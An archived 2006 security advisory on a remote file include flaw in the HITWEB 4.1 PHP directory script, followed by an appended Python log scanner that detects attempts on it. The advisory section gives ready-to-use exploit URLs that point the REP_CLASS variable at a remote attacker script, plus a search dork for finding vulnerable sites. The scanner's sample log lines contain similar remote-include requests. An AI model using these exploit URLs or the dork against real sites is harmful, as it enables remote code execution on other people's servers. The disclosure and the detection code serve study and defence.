Securityvulns SECURITYVULNS:DOC:14874
Oct 31, 2006 - 12:00 a.m.

HITWEB Remote File Include

vulners.com

#################################

HITWEB 4.1

#################################
#Class: Remote|Local File Include Vulnerability

Remote: Yes

Local: No

Type: High

#Site: http://www.hitweb.org/

Site Download: http://www.lbb.org/cgi-bin/script/telecharger.cgi?ID=2919

Author: x_w0x

Contact: [email protected]

###################################
#Vuln Code
=================addlink.php3================

include "$REP_CLASS/template.inc";
include "$REP_CLASS/class.http_storage".$EXT_PHP ;

include "$REP_CLASS/class.hitweb".$EXT_PHP ;
include "admin/$REP_LANG_ADMIN/$LANG_ADMIN".
include "$REP_INC/lib_database.php3";

==============appreciation.php3===============

include "$REP_CLASS/template.inc";

==============genpage.php3================

include "$REP_INC/lib_database.php3";

============refererpoint.php3================

include "$REP_CLASS/template.inc";

####################################

£xploit:

http://www.victim.com/[path]/addlink.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/genpage.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/refererpoint.php3?REP_CLASS=http://DarknesseScript.txt

#Dork : "Copyright © 1998 - 2004 Brian FRAVAL"

#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0k, and elite-team

#w£lc0m£ In x0|0x
#by x_w0x
############################################################
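
A defender-side check for the pattern above, added here as an example (not part of the original advisory or of HITWEB): it scans web-server access logs for requests that try to set the include-path variables shown in the code excerpts. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Include-path variables from the advisory's code excerpts. The application
# sets these itself, so a client has no legitimate reason to send them.
INCLUDE_VARS = {"REP_CLASS", "REP_INC", "REP_LANG_ADMIN", "LANG_ADMIN", "EXT_PHP"}
# Value starting with a scheme-like prefix (http:, ftp:, php:, ...), // or \\.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Client address and request target of a combined-format access log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample lines (documentation addresses, made-up paths and values).
SAMPLE_LOG = """\
192.0.2.10 - - [31/Oct/2006:10:00:01 +0000] "GET /hitweb/genpage.php3?cat=12 HTTP/1.1" 200 5120
198.51.100.7 - - [31/Oct/2006:10:00:05 +0000] "GET /hitweb/addlink.php3?REP_CLASS=http://example.invalid/x.txt HTTP/1.1" 200 312
198.51.100.7 - - [31/Oct/2006:10:00:09 +0000] "GET /hitweb/genpage.php3?REP_INC=%68ttp%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 290
203.0.113.4 - - [31/Oct/2006:10:00:12 +0000] "GET /hitweb/refererpoint.php3?REP_CLASS=../inc HTTP/1.1" 200 100
"""

def classify(line):
    """Return (client, path, variable, severity) for a suspicious line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    # parse_qsl percent-decodes, so %68ttp%3A// is compared as http://
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP registers REP_CLASS[] and REP.CLASS under the name REP_CLASS too.
        base = name.split("[", 1)[0].replace(".", "_").replace(" ", "_")
        if base in INCLUDE_VARS:
            severity = "remote-include" if REMOTE_VALUE.match(value) else "override"
            return (client, url.path, base, severity)
    return None

def scan(lines):
    """Return the findings for every suspicious line, in log order."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(*hit)
```

Access logs record query strings only; the same variables sent in a POST body or a cookie need request-body logging or a WAF rule to be seen.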